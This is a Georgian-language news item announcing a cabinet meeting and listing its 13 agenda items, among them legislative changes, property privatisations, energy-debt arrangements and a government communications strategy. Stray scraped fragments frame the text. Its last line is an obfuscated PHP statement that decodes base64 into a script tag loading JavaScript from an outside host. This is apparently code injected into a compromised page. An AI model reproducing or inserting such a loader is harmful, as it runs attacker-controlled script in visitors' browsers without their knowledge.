celsiusi
ავერსი შნაიდერი

დღეს, 14 საათზე მთავრობის ადმინისტრაციაში მინისტრთა კაბინეტის სხდომა გაიმართება. მთავრობის სხდომაზე დღის წესრიგით გათვალისწინებულ 13 საკითხს განიხილავენ.

ეს საკითხებია:

  1. საქართველოს კანონის პროექტი „საქართველოს საზღვაო კოდექსში“ ცვლილებების შეტანის შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  2. საქართველოს კანონების პროექტები „იარაღის შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“ და „ლიცენზიებისა და ნებართვების შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“, მომხსენებელი: თავდაცვის მინისტრი ჯუანშერ ბურჭულაძე;
  3. საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „თბილისი ენერჯისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  4. საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ქონების სააქციო საზოგადოება „ენერგო-პრო ჯორჯიასათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  5. საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ქონების უცხოური საწარმოს ფილიალ „ჯიენვი ჯორჯიასათვის“ იჯარის უფლებით გადაცემაზე თანხმობის მიცემის შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  6. საქართველოს მთავრობის განკარგულების პროექტი ,,შპს „საფეხბურთო კლუბ საბურთალოსათვის“ სახელმწიფო საკუთრებაში არსებული ქონების იჯარის ფორმით გადაცემის თაობაზე თანხმობის მიცემის შესახებ“ საქართველოს მთავრობის 2011 წლის 1 მარტის №500 განკარგულებაში ცვლილების შეტანის თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  7. საქართველოს მთავრობის განკარგულების პროექტი ,,საქართველოს მთავრობასა და შპს „დიეს ენერჯის“ შორის „დიეს ენერჯის მზის ელექტროსადგურის“ შესახებ 2023 წლის 3 ივლისს დადებულ ხელშეკრულებაში ცვლილების შეტანის თაობაზე“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  8. საქართველოს მთავრობის განკარგულების პროექტი ,,ენერგეტიკული საწარმოების მიმართ შპს „ჯორჯიან მანგანეზისა“ და სს „ზესტაფონის ფეროშენადნობთა ქარხნის“ არსებული დავალიანების გადავადებისა და მასთან დაკავშირებული ურთიერთობების დარეგულირების თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;
  9. საქართველოს მთავრობის განკარგულებების პროექტები ,,პირისათვის საერთაშორისო კომპანიის სტატუსის მინიჭების შესახებ“ (5 პროექტი), მომხსენებელი: ფინანსთა მინისტრი ლაშა ხუციშვილი;
  10. საქართველოს მთავრობის განკარგულების პროექტი ,,ცალკეულ იძულებით გადაადგილებულ პირთა - დევნილთა ოჯახების გრძელვადიანი საცხოვრებელი ფართით უზრუნველყოფისათვის გასატარებელ ღონისძიებათა შესახებ”, მომხსენებელი: ჯანდაცვის მინისტრი ზურაბ აზარაშვილი;
  11. საქართველოს მთავრობის დადგენილების პროექტი ,,განსაკუთრებული რეგულირების სარეკრეაციო ზონის სტატუსის მინიჭების შესახებ”, მომხსენებელი: თბილისის მერია კახა კალაძე;
  12. საქართველოს მთავრობის განკარგულების პროექტი ,,შპს „საქართველოს ტელერადიოცენტრის“ (ს/კ: 203829250) საკუთრებაში არსებული უძრავი ქონების შპს „კასს თაუერისთვის“ (ს/კ: 404615546) სარგებლობის უფლებით გადაცემის შესახებ შპს „საქართველოს ტელერადიოცენტრისა“ და ქალაქ თბილისის მუნიციპალიტეტის მთავრობის ინფორმაციის მოწონებისა და შპს „საქართველოს ტელერადიოცენტრისათვის“ თანხმობის მიცემის თაობაზე“, მომხსენებელი: თბილისის მერია კახა კალაძე;
  13. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობის საკომუნიკაციო სტრატეგია 2024-2027 წწ-ის“ დამტკიცების შესახებ”, მომხსენებელი: მთავრობის ადმინისტრაციის ხელმძღვანელი: რევაზ ჯაველიძე;

223
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");